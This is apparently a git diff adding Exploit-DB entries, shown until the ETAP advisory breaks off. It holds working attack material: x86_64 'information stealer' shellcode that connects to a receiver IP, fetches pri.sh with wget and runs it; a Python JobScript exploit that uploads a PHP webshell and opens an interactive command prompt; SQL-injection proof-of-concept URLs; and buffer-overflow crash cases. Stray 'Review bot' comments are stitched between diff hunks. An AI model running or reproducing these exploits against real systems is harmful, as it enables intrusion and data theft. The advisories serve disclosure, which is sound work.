diff --git a/files.csv b/files.csv
index 19a113f76..4a07f7ae4 100755
--- a/files.csv
+++ b/files.csv
@@ -36029,3 +36029,8 @@ id,file,description,date,author,platform,type,port
 39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
 39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0
 39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
+39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
+39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
+39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
+39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
diff --git a/platforms/lin_x86-64/shellcode/39847.c b/platforms/lin_x86-64/shellcode/39847.c
new file mode 100755
index 000000000..936a0dbab
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39847.c
@@ -0,0 +1,576 @@
+/*
+ # Title : Linux x86_64 information stealer
+ # Date : 23-05-2016
+ # Author : Roziul Hasan Khan Shifat
+ # Tested On : Ubuntu 14.04 LTS x86_64
+ # Contact : shifath12@gmail.com
+
+*/
+
+
+/*
+ How does this shellcode works
+ -----------------------------------
+1. First it connects to the information reciver
+2. then it download a sh script from http://192.168.30.129/pri.sh (server running on Kali linux)
+3. duplicating stdout,stderr with socket descriptor
+4. then it execute the script using sh
+
+*/
+
+/*
+
+Note: the pri.sh file was in kali linux.the server was Kali linux
+client was Ubuntu
+it downloads the pri.sh from kali linux
+and Executes it on Ubuntu
+*/
+
+
+
+/*
+ Requirements of this shellcode
+ --------------------------------------
+1.link of pri.sh (You can Found it on http://pastebin.com/V4gudKL5 ) . this script isn't mine.I've taken it from another.I customized the script
+2.reciver ip
+
+*/
+
+
+/*
+ How to use this shellcode
+ ---------------------------------
+1. Upload the pri.sh any site
+2. TO download the pri.sh , U need to Customize the wget procedure (I've marked where to customized)
+3. Customize the connect procedure for connect to the reciver where i marked
+4. U need to know assembly to completed 1,2 instruction
+
+*/
+
+
+
+/*
+ Reciver
+ ---------
+To recive the Information U may Use Netcat
+If U want to view the informations on Web browser , I've a php script for U. upload it any site.
+ + + + +if U this script , the reciver ip will be the website ip + +BUT I RECOMMEND U TO USE NETCAT + + +*/ + + + + +/* + +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 6a 06 pushq $0x6 + 400082: 6a 01 pushq $0x1 + 400084: 6a 02 pushq $0x2 + 400086: 5f pop %rdi + 400087: 5e pop %rsi + 400088: 5a pop %rdx + 400089: 6a 29 pushq $0x29 + 40008b: 58 pop %rax + 40008c: 0f 05 syscall + 40008e: 48 31 db xor %rbx,%rbx + 400091: 48 89 c3 mov %rax,%rbx + 400094: 48 31 c0 xor %rax,%rax + 400097: 48 31 ff xor %rdi,%rdi + 40009a: b0 39 mov $0x39,%al + 40009c: 0f 05 syscall + 40009e: 4d 31 c9 xor %r9,%r9 + 4000a1: 4c 39 c8 cmp %r9,%rax + 4000a4: 74 18 je 4000be + 4000a6: 6a 3c pushq $0x3c + 4000a8: 58 pop %rax + 4000a9: 0f 05 syscall + +00000000004000ab : + 4000ab: 48 31 f6 xor %rsi,%rsi + 4000ae: 48 f7 e6 mul %rsi + 4000b1: 56 push %rsi + 4000b2: 6a 3c pushq $0x3c + 4000b4: 48 89 e7 mov %rsp,%rdi + 4000b7: b0 23 mov $0x23,%al + 4000b9: 0f 05 syscall + 4000bb: eb 01 jmp 4000be + 4000bd: c3 retq + +00000000004000be : + 4000be: 6a 10 pushq $0x10 + 4000c0: 5a pop %rdx + 4000c1: 53 push %rbx + 4000c2: 5f pop %rdi + 4000c3: 48 31 c0 xor %rax,%rax + 4000c6: 50 push %rax + 4000c7: 50 push %rax + 4000c8: 50 push %rax + 4000c9: c6 04 24 02 movb $0x2,(%rsp) + 4000cd: 66 c7 44 24 02 05 fc movw $0xfc05,0x2(%rsp) + 4000d4: c7 44 24 04 c0 a8 1e movl $0x811ea8c0,0x4(%rsp) + 4000db: 81 + 4000dc: 48 89 e6 mov %rsp,%rsi + 4000df: b0 2a mov $0x2a,%al + 4000e1: 0f 05 syscall + 4000e3: 48 31 ff xor %rdi,%rdi + 4000e6: 48 39 f8 cmp %rdi,%rax + 4000e9: 7c c0 jl 4000ab + 4000eb: 48 31 c0 xor %rax,%rax + 4000ee: 48 31 f6 xor %rsi,%rsi + 4000f1: 48 ff c6 inc %rsi + 4000f4: 48 89 df mov %rbx,%rdi + 4000f7: b0 21 mov $0x21,%al + 4000f9: 0f 05 syscall + 4000fb: 48 31 c0 xor %rax,%rax + 4000fe: 48 ff c6 inc %rsi + 400101: 48 89 df mov %rbx,%rdi + 400104: b0 21 mov $0x21,%al + 400106: 0f 05 syscall + 400108: 48 31 c0 xor %rax,%rax + 40010b: 48 83 c0 39 add $0x39,%rax + 40010f: 0f 05 
syscall + 400111: 48 31 ff xor %rdi,%rdi + 400114: 4d 31 e4 xor %r12,%r12 + 400117: 49 89 c4 mov %rax,%r12 + 40011a: 48 39 f8 cmp %rdi,%rax + 40011d: 74 59 je 400178 + 40011f: 4d 31 d2 xor %r10,%r10 + 400122: 48 31 d2 xor %rdx,%rdx + 400125: 4c 89 d6 mov %r10,%rsi + 400128: 4c 89 e7 mov %r12,%rdi + 40012b: 48 31 c0 xor %rax,%rax + 40012e: b0 3d mov $0x3d,%al + 400130: 0f 05 syscall + 400132: 48 31 c0 xor %rax,%rax + 400135: 48 31 d2 xor %rdx,%rdx + 400138: 50 push %rax + 400139: 50 push %rax + 40013a: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp) + 400141: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp) + 400148: 68 + 400149: 48 89 e7 mov %rsp,%rdi + 40014c: 50 push %rax + 40014d: 50 push %rax + 40014e: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp) + 400155: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp) + 40015c: c6 44 24 06 68 movb $0x68,0x6(%rsp) + 400161: 48 89 e6 mov %rsp,%rsi + 400164: 52 push %rdx + 400165: 56 push %rsi + 400166: 57 push %rdi + 400167: 48 89 e6 mov %rsp,%rsi + 40016a: 48 83 c0 3b add $0x3b,%rax + 40016e: 0f 05 syscall + 400170: 41 51 push %r9 + 400172: 5f pop %rdi + 400173: 6a 03 pushq $0x3 + 400175: 58 pop %rax + 400176: 0f 05 syscall + +0000000000400178 : + 400178: 48 31 c0 xor %rax,%rax + 40017b: 50 push %rax + 40017c: 50 push %rax + 40017d: 50 push %rax + 40017e: c7 04 24 2f 75 73 72 movl $0x7273752f,(%rsp) + 400185: c7 44 24 04 2f 62 69 movl $0x6e69622f,0x4(%rsp) + 40018c: 6e + 40018d: c7 44 24 08 2f 2f 77 movl $0x67772f2f,0x8(%rsp) + 400194: 67 + 400195: 66 c7 44 24 0c 65 74 movw $0x7465,0xc(%rsp) + 40019c: 48 89 e7 mov %rsp,%rdi + 40019f: 50 push %rax + 4001a0: 50 push %rax + 4001a1: 50 push %rax + 4001a2: 50 push %rax + 4001a3: c7 04 24 68 74 74 70 movl $0x70747468,(%rsp) + 4001aa: c7 44 24 04 3a 2f 2f movl $0x312f2f3a,0x4(%rsp) + 4001b1: 31 + 4001b2: c7 44 24 08 39 32 2e movl $0x312e3239,0x8(%rsp) + 4001b9: 31 + 4001ba: c7 44 24 0c 36 38 2e movl $0x332e3836,0xc(%rsp) + 4001c1: 33 + 4001c2: c7 44 24 10 30 2e 31 movl $0x32312e30,0x10(%rsp) 
+ 4001c9: 32 + 4001ca: c7 44 24 14 39 2f 70 movl $0x72702f39,0x14(%rsp) + 4001d1: 72 + 4001d2: c7 44 24 18 69 2e 73 movl $0x68732e69,0x18(%rsp) + 4001d9: 68 + 4001da: 48 89 e6 mov %rsp,%rsi + 4001dd: 48 31 d2 xor %rdx,%rdx + 4001e0: 50 push %rax + 4001e1: 66 c7 04 24 2d 4f movw $0x4f2d,(%rsp) + 4001e7: 48 89 e1 mov %rsp,%rcx + 4001ea: 50 push %rax + 4001eb: 50 push %rax + 4001ec: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp) + 4001f3: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp) + 4001fa: c6 44 24 06 68 movb $0x68,0x6(%rsp) + 4001ff: 49 89 e7 mov %rsp,%r15 + 400202: 52 push %rdx + 400203: 41 57 push %r15 + 400205: 51 push %rcx + 400206: 56 push %rsi + 400207: 57 push %rdi + 400208: 48 89 e6 mov %rsp,%rsi + 40020b: b0 3b mov $0x3b,%al + 40020d: 0f 05 syscall + + + + +*/ + + + + + +/* + + +section .text + global _start +;----------------- + + + +_start: + +;socket() +push 6 +push 1 +push 2 + +pop rdi +pop rsi +pop rdx + +push 41 +pop rax +syscall + +;------------------ + +xor rbx,rbx +mov rbx,rax ;socket descriptor + +;------------- +xor rax,rax +xor rdi,rdi + +mov al,57 +syscall + +xor r9,r9 + +cmp rax,r9 +jz connect + +push byte 60 +pop rax +syscall + + + +retry: + +xor rsi,rsi +mul rsi + +push rsi +push byte 60 ;1 min ( change it if U want ) + +mov rdi,rsp + +mov al,35 +syscall + +jmp connect +ret + + + +connect: + +;connect() +push 16 +pop rdx + +push rbx +pop rdi + +xor rax,rax +push rax +push rax +push rax + +mov [rsp],byte 2 + +;----------------------------------- +;customize these staetments +mov [rsp+2],word 0xfc05 ;port 1532 ( U may change it, As U wish ) +mov [rsp+4],dword 0x811ea8c0 ;ip of reciver (must change it) +;-------------------------------------- + + +mov rsi,rsp + +mov al,42 +syscall + +xor rdi,rdi +cmp rax,rdi +jl retry + + + + +;------------dup2(sd,1) + +xor rax,rax +xor rsi,rsi +inc rsi + +mov rdi,rbx + +mov al,33 +syscall + +;------------ + +;------------dup2(sd,2) + +xor rax,rax + +inc rsi + +mov rdi,rbx + +mov al,33 +syscall + +;------------ 
+;fork() + +xor rax,rax +add rax,57 +syscall + +xor rdi,rdi +xor r12,r12 + +mov r12,rax ;pid +cmp rax,rdi + +jz wget + +;--------------- +;wait4() + +xor r10,r10 ;null +xor rdx,rdx ;null +mov rsi,r10 ;status +mov rdi,r12 ;pid + +xor rax,rax +mov al,61 +syscall + + + +;; +;------------------------- + +;execve("//bin/sh",{"//bin/sh",".pri.sh",NULL},NULL); + +xor rax,rax +xor rdx,rdx +push rax +push rax + + +mov [rsp],dword '//bi' +mov [rsp+4],dword 'n/sh' + + +mov rdi,rsp + + +push rax +push rax + +mov [rsp],dword '.pri' +mov [rsp+4],word '.s' +mov [rsp+6],byte 'h' +mov rsi,rsp + +push rdx +push rsi +push rdi + +mov rsi,rsp + +add rax,59 +syscall +;-------- +;close(fd) + +push r9 +pop rdi + +push 3 +pop rax +syscall + + + + +wget: +;execve("/usr/bin//wget",{"/usr/bin//wget","http ://1 92.1 68.3 0.12 9/pr i.sh","-O",".pri.sh",NULL},NULL) + +xor rax,rax + + +push rax +push rax +push rax + +mov [rsp],dword '/usr' +mov [rsp+4],dword '/bin' +mov [rsp+8],dword '//wg' +mov [rsp+12],word 'et' + +mov rdi,rsp + +push rax +push rax +push rax +push rax + +;---------------------- +;cusmizetd these statements for the link of pri.sh +mov [rsp],dword 'http' +mov [rsp+4],dword '://1' +mov [rsp+8],dword '92.1' +mov [rsp+12],dword '68.3' +mov [rsp+16],dword '0.12' +mov [rsp+20],dword '9/pr' +mov [rsp+24],dword 'i.sh' +;------------------------ + +mov rsi,rsp +xor rdx,rdx + +push rax +mov [rsp],word '-O' +mov rcx,rsp + +push rax +push rax + +mov [rsp],dword '.pri' +mov [rsp+4],word '.s' +mov [rsp+6],byte 'h' + +mov r15,rsp + + + + + + +push rdx +push r15 +push rcx +push rsi +push rdi + +mov rsi,rsp + +mov al,59 +syscall + + +*/ + + + + + + + + + + + + + +#include +#include + + + +char 
shellcode[]="\x6a\x06\x6a\x01\x6a\x02\x5f\x5e\x5a\x6a\x29\x58\x0f\x05\x48\x31\xdb\x48\x89\xc3\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x74\x18\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x6a\x3c\x48\x89\xe7\xb0\x23\x0f\x05\xeb\x01\xc3\x6a\x10\x5a\x53\x5f\x48\x31\xc0\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xfc\xc7\x44\x24\x04\xc0\xa8\x1e\x81\x48\x89\xe6\xb0\x2a\x0f\x05\x48\x31\xff\x48\x39\xf8\x7c\xc0\x48\x31\xc0\x48\x31\xf6\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\x48\x31\xff\x4d\x31\xe4\x49\x89\xc4\x48\x39\xf8\x74\x59\x4d\x31\xd2\x48\x31\xd2\x4c\x89\xd6\x4c\x89\xe7\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x41\x51\x5f\x6a\x03\x58\x0f\x05\x48\x31\xc0\x50\x50\x50\xc7\x04\x24\x2f\x75\x73\x72\xc7\x44\x24\x04\x2f\x62\x69\x6e\xc7\x44\x24\x08\x2f\x2f\x77\x67\x66\xc7\x44\x24\x0c\x65\x74\x48\x89\xe7\x50\x50\x50\x50\xc7\x04\x24\x68\x74\x74\x70\xc7\x44\x24\x04\x3a\x2f\x2f\x31\xc7\x44\x24\x08\x39\x32\x2e\x31\xc7\x44\x24\x0c\x36\x38\x2e\x33\xc7\x44\x24\x10\x30\x2e\x31\x32\xc7\x44\x24\x14\x39\x2f\x70\x72\xc7\x44\x24\x18\x69\x2e\x73\x68\x48\x89\xe6\x48\x31\xd2\x50\x66\xc7\x04\x24\x2d\x4f\x48\x89\xe1\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x49\x89\xe7\x52\x41\x57\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; /* insert shellcode here */ + + +int main() +{ +printf("shellcode length %ld",( unsigned long ) strlen(shellcode)); + +( * (int(*)()) shellcode) (); + +} diff --git a/platforms/php/webapps/39848.py b/platforms/php/webapps/39848.py new file mode 100755 index 000000000..af55a13f9 --- /dev/null +++ b/platforms/php/webapps/39848.py 
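Review bot: The "How does this shellcode works" comment at the top of 39847.c lists the download (step 2) before the descriptor duplication (step 3), but the assembly listing in the same hunk performs both dup2 calls right after connect and only then forks; the child runs /usr/bin//wget and the parent waits before running //bin/sh on .pri.sh. Anyone using this entry to write detections reads that comment first, so it should match the listing and name what is observable, for example `/* order: connect to 192.168.30.129:1532, dup2 socket onto fds 1 and 2, fork; child execs /usr/bin//wget <url> -O .pri.sh, parent wait4s then execs //bin/sh .pri.sh */`. The address and port are the author's lab values from the `connect:` block and should be labelled as such in the comment. Separately, the harness at the end prints `(unsigned long) strlen(shellcode)` with `%ld`; `%lu` matches the cast.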
@@ -0,0 +1,128 @@
+#!C:/Python27/python.exe -u
+#
+#
+# JobScript Remote Code Execution Exploit
+#
+#
+# Vendor: Jobscript
+# Product web page: http://www.jobscript.in
+# Affected version: Unknown
+#
+# Summary: JobScript is inbuilt structured website was developed in PHP and MySQL
+# database. It's a complete job script for those who wants to start a professional
+# job portal website like naukri.com, monster.com, clickjobs.com or any such major
+# job portals. Jobscript was designed and developed with the following features like
+# control panel for Employer's and also for Job Seeker's, email alerts, job search,
+# online resume, payment and membership plans.
+#
+# Desc: JobScript suffers from an authenticated arbitrary PHP code execution. The
+# vulnerability is caused due to the improper verification of uploaded files in
+# '/admin-ajax.php' script thru the 'name' and 'file' POST parameters. This can
+# be exploited to execute arbitrary PHP code by uploading a malicious PHP script
+# file with '.php' extension (to bypass the '.htaccess' block rule) that will be
+# stored in '/jobmonster/wp-content/uploads/jobmonster/' directory.
+#
+# Tested on: Apache 2.4.9
+# PHP 5.4.26
+#
+# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
+#
+# Zero Science Lab - http://www.zeroscience.mk
+# Macedonian Information Security Research And Development Laboratory
+#
+#
+# Advisory ID: ZSL-2016-5322
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5322.php
+#
+#
+# 31.03.2016
+#
+
+import itertools, mimetools, mimetypes
+import cookielib, urllib, urllib2, sys
+import os, time, re, requests, httplib
+
+from cStringIO import StringIO
+from urllib2 import URLError
+
+global file, file1
+file = ';nonce'
+file1 = '"security"'
+
+host = sys.argv[1]
+
+cj = cookielib.CookieJar()
+opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+
+prelogin = opener2.open('http://'+host+'/jobmonster/member-2/')
+output = prelogin.read()
+
+for line in output.splitlines():
+ if file1 in line:
+ security = str(line.split("=")[4:])[3:13]
+ break
+
+print 'Login please.'
+
+username = raw_input('Enter username: ')
+password = raw_input('Enter password: ')
+
+login_data = urllib.urlencode({
+ 'action' : 'noo_ajax_login',
+ 'log' : username,
+ 'pwd' : password,
+ 'remember' : 'false',
+ 'security' : security,
+ 'redirect_to' : 'http%3A%2F%2Fcscript.in%2Fjobmonster%2Fmember-2%3Fpagename%3Dmember-2%26logged_in%3D1'
+ })
+
+login = opener2.open('http://'+host+'/jobmonster/wp-admin/admin-ajax.php', login_data)
+auth = login.read()
+
+if re.search(r'false', auth):
+ print 'Incorrect username or password'
+ sys.exit()
+else:
+ print 'Authenticated'
+
+response = opener2.open('http://'+host+'/jobmonster/member-2/?pagename=member-2&logged_in=1')
+response = opener2.open('http://'+host+'/jobmonster/post-a-resume/?action=resume_general')
+output = response.read()
+
+for line in output.splitlines():
+ if file in line:
+ nonce = str(line.split("=")[3:])[28:38]
+
+headers = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0','Referer':'\'http://'+host+'/jobmonster/post-a-resume/?action=resume_general\'','Accept-Language':'en-US,en;q=0.5','Content-type':'multipart/form-data; boundary=---------------------------51402178812572','Connection':'close','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Content-length':'335'}
+
+body = """-----------------------------51402178812572
+Content-Disposition: form-data; name="name"
+
+RCE.php
+-----------------------------51402178812572
+Content-Disposition: form-data; name="file"; filename="RCE.php"
+Content-Type: application/pdf
+
+
+
+-----------------------------51402178812572--"""
+
+response = requests.post('http://'+host+'/jobmonster/wp-admin/admin-ajax.php?action=noo_plupload&nonce='+nonce+'', data=body, headers=headers, cookies=cj)
+
+raw_input()
+while True:
+ try:
+ cmd = raw_input('shell@'+host+':~# ')
+ execute = opener2.open('http://'+host+'/jobmonster/wp-content/uploads/jobmonster/RCE.php?cmd='+urllib.quote(cmd))
+ reverse = execute.read()
+ print reverse
+
+ if cmd.strip() == 'exit':
+ break
+
+ except Exception:
+ break
+
+sys.exit()
\ No newline at end of file
diff --git a/platforms/php/webapps/39849.txt b/platforms/php/webapps/39849.txt
new file mode 100755
index 000000000..6a5bacd47
--- /dev/null
+++ b/platforms/php/webapps/39849.txt
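Review bot: The header comment of 39848.py names the vulnerable handler and the upload directory but gives a defender nothing to act on: it says "Affected version: Unknown", lists no fixed release, and has no mitigation or log indicator. Below the Desc paragraph I would add `# Mitigation: validate the uploaded file type server-side in the noo_plupload handler and disable PHP execution under wp-content/uploads/` and `# Detection: POST to admin-ajax.php?action=noo_plupload followed by a GET for a .php file under /wp-content/uploads/jobmonster/`. Both lines restate only what the Desc text and the request URLs in this file already show. The header should also say that the script sends the username and password typed at the prompt over plain `http://`, so it belongs on an isolated test network.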
@@ -0,0 +1,85 @@
+[RCESEC-2016-002] XenAPI v1.4.1 for XenForo Multiple Unauthenticated SQL Injections
+
+RCE Security Advisory
+https://www.rcesecurity.com
+
+
+1. ADVISORY INFORMATION
+=======================
+Product: XenAPI for XenForo
+Vendor URL: github.com/Contex/XenAPI
+Type: SQL Injection [CWE-89]
+Date found: 2016-05-20
+Date published: 2016-05-23
+CVSSv3 Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
+CVE: -
+
+
+2. CREDITS
+==========
+This vulnerability was discovered and researched by Julien Ahrens from
+RCE Security.
+
+
+3. VERSIONS AFFECTED
+====================
+XenAPI for XenForo v1.4.1
+older versions may be affected too but were not tested.
+
+
+4. INTRODUCTION
+===============
+This Open Source REST API allows usage of several of XenForo's functions,
+such as authentication, user information and many other functions!
+
+(from the vendor's homepage)
+
+
+5. VULNERABILITY DETAILS
+========================
+The plugin "XenAPI" for XenForo offers a REST Api with different functions
+to query and edit information from the XenForo database backend. Amongst
+those are "getGroup" and "getUsers", which can be called without
+authentication (default) and since the application does not properly
+validate and sanitize the "value" parameter, it is possible to inject
+arbitrary SQL commands into the XenForo backend database.
+
+The following proof-of-concepts exploit each vulnerable REST action
+and extract the hostname of the server:
+
+https://127.0.0.1/api.php?action=getUsers&value=' UNION ALL SELECT
+CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23
+
+https://127.0.0.1/api.php?action=getGroup&value=' UNION ALL SELECT
+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS
+CHAR)%2C0x20))%2CNULL%23
+
+
+6. RISK
+=======
+The vulnerability allows remote attackers to read sensitive information
+from the XenForo database like usernames and passwords.
Since the affected
+REST actions do not require an authentication hash, these vulnerabilities
+can be exploited by an unauthenticated attacker.
+
+
+7. SOLUTION
+===========
+Update to the latest version v1.4.2
+
+
+8. REPORT TIMELINE
+==================
+2016-05-20: Discovery of the vulnerability
+2016-05-20: Notified vendor via contact address
+2016-05-20: Vendor provides update for both issues
+2016-05-21: Provided update fixes the reported issues
+2016-05-21: Vendor publishes update
+2016-05-23: Advisory released
+
+
+9. REFERENCES
+=============
+https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf
+https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336
+
diff --git a/platforms/windows/dos/39846.txt b/platforms/windows/dos/39846.txt
new file mode 100755
index 000000000..9d75943c8
--- /dev/null
+++ b/platforms/windows/dos/39846.txt
@@ -0,0 +1,331 @@ + +Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities + + +Vendor: Operation Technology, Inc. +Product web page: http://www.etap.com +Affected version: 14.1.0.0 + +Summary: Enterprise Software Solution for Electrical Power Systems. ETAP +is the most comprehensive electrical engineering software platform for the +design, simulation, operation, and automation of generation, transmission, +distribution, and industrial systems. As a fully integrated model-driven +enterprise solution, ETAP extends from modeling to operation to offer a +Real-Time Power Management System. + +Desc: Multiple ETAP binaries are prone to a stack-based buffer overflow +vulnerability because the application fails to handle malformed arguments. +An attacker can exploit these issues to execute arbitrary code within the +context of the application or to trigger a denial-of-service conditions. + +Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64 + Microsoft Windows 7 Ultimate SP1 (EN) x86_64 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5324 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php + + +07.04.2016 + +-- + + + +Confirmed vulnerable binaries: +------------------------------ + +acsdvd.exe +ca.exe +csdvd.exe +DBExtractConsoleApp.exe +dccalc.exe +etarcgis.exe +etarcgis92.exe +etarcgis93.exe +ETArcGIS_TD.exe +ETArcGIS_TD10.exe +etcabp.exe +etcp.exe +etgrd.exe +ETPanelRep.exe +ET_CATIA.exe +et_ieee.exe +harmonic.exe +LA3PH.exe +LF3PH.exe +lffd.exe +lfgs.exe +lfle.exe +lfnr.exe +ms.exe +OCP.exe +opf.exe +OtiMongoConvert.exe +PlotCompare64.exe +ra.exe +SC3Ph.exe +scansi1p.exe +scansi3p.exe +SCGost1p.exe +sciec1p.exe +sciec3p.exe +sciectr.exe +scsource.exe +SFA.exe +so3ph.exe +stlf.exe +svc.exe +TDULF.exe +ts.exe +uc.exe + + + +PoCs: +----- +[vuln binary] [>256 bytes as arg] +=================================== + + +C:\ETAP 1410>etcp.exe 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +(281c.202c): Access violation - code c0000005 (!!! second chance !!!) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll - +*** WARNING: Unable to verify checksum for C:\ETAP 1410\etcp.exe +*** ERROR: Module load completed but symbols could not be loaded for C:\ETAP 1410\etcp.exe +eax=00000041 ebx=00190002 ecx=0000000a edx=00000365 esi=00882966 edi=000003eb +eip=00407f38 esp=0018f660 ebp=0018f778 iopl=0 nv up ei pl nz na pe cy +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207 +etcp+0x7f38: +00407f38 668943fe mov word ptr [ebx-2],ax ds:002b:00190000=6341 +0:000> !exchain +0018ff3c: etcp+10041 (00410041) +Invalid exception stack at 00410041 + +=================================== + + +C:\ETAP 1410>PlotCompare64.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt. 
+ at System.String.wcslen(Char* ptr) + at System.String.CtorCharPtr(Char* ptr) + at wmain(Int32 argc, Char** argv, Char** envp) + at wmainCRTStartup() + + +(3a98.1e20): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** WARNING: Unable to verify checksum for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll +*** ERROR: Module load completed but symbols could not be loaded for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll +mscorlib_ni+0x48f380: +000007fe`dd6df380 0fb701 movzx eax,word ptr [rcx] ds:0045005c`003a0043=???? +0:000> d rdi +00000000`0278f558 00 65 93 dd fe 07 00 00-06 02 00 00 41 00 41 00 .e..........A.A. +00000000`0278f568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f5a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f5b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0278f5c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. + +=============================== + + +C:\ETAP 1410>ra.exe 